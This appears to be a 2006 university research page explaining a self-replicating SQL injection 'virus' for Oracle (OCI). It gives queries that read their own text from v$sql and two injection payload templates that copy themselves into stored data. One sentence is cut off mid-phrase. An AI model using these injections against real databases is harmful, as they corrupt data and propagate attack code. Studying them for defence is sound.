SQL Virus Using Self-Referential Queries for Oracle (OCI)
The currently executing query can be obtained using the
SQL_TEXT field of the v$sql view,
which provides access to all currently executing queries.
To access the v$sql view, the user must be an
administrator.
The correct query can be extracted from this table using the following query:
SELECT sql.SQL_TEXT from v$sql sql,
v$session ses, v$mystat sta WHERE
sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND
sta.STATISTIC#=0
Query 1 - Self-referential query for
Oracle
|
select SQL_TEXT FROM v$sql WHERE
INSTR(SQL_TEXT, 'unique string')>0
Query 2 - Self-referential query for
Oracle
|
This query is shorter than the first example, but may fail if the string is not unique, as this would cause the query to return multiple results, which causes an error if a single result was expected.
On Oracle, the following code will perform the attack, when using the OCI API:
%content%',NewContents=(SELECT
SUBSTR(SQL_TEXT,43,%len%)FROM v$sql WHERE
INSTR(SQL_TEXT,'%payload%')>0)--
Exploit 1 - Oracle (OCI) exploit using
single query
|
v$sql view. This will
cause the attack to fail if multiple instances run at the
same time, as the SELECT query returns multiple values.
Exploit 2 shows a more reliable Oracle exploit, but this one is considerably larger.
%content%',NewContents=(SELECT SUBSTR
(sql.SQL_TEXT, 43, %len%) from v$sql sql,
v$session ses, v$mystat sta WHERE
sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND
sta.STATISTIC#=0)--%payload%
Exploit 2 - Reliable Oracle (OCI) exploit
using single query
|
|
|||||||||||||
|
|
phonebook |
 FEW |
VU |
site map |
search |
webmaster |
|||||||
| Last modified: Monday, 27 February 2006 14:33, CET | |||||||||||||
|
If you spot a mistake, please
e-mail the maintainer of this page.
|
|||||||||||||
